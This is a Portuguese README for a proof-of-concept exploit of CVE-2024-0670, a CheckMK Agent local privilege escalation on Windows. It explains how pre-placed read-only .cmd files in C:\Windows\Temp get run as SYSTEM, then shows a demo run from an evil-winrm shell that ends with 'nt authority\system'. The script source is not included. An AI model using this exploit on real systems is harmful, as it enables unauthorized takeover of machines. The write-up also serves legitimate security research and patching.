
PoC para CVE-2024-0670
Este repositório fornece um exploit de Prova de Conceito (PoC) para a vulnerabilidade CVE-2024-0670, que afeta o CheckMK Agent em sistemas Windows. A vulnerabilidade ocorre quando o CheckMK Agent cria e executa arquivos temporários no diretório C:\Windows\Temp. Um atacante pode abusar desse comportamento posicionando previamente arquivos maliciosos nesse diretório com proteção contra escrita. Quando o agente tenta criar um arquivo temporário que já existe como somente leitura, ele não consegue substituí-lo, mas ainda assim executa o arquivo existente com privilégios de SYSTEM, possibilitando a escalada de privilégios.
Referência do Advisory: SEC Consult - Escalação local de privilégios via arquivos graváveis no Checkmk Agent
Este projeto é destinado apenas para fins educacionais, de pesquisa e testes de segurança autorizados.
Não use este código em sistemas que você não possui ou para os quais não tem permissão explícita para testar.
O autor não é responsável por qualquer dano ou uso indevido.
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
[+] Searching for Check MK installer...
[+] Found: C:\Windows\Installer\1e6f2.msi
[+] Using command: whoami > C:\Windows\Temp\whoami.txt
[+] Preparing 18000 .cmd files...
[*] Progress: 0%
[*] Progress: 10%
[*] Progress: 20%
[*] Progress: 30%
[*] Progress: 40%
[*] Progress: 50%
[*] Progress: 60%
[*] Progress: 70%
[*] Progress: 80%
[*] Progress: 90%
[*] Progress: 100%
[+] Triggering MSI to execute command...
[+] Done
evil-winrm-py PS C:\Users\magicrc\Desktop> cat C:\Windows\Temp\whoami.txt
nt authority\system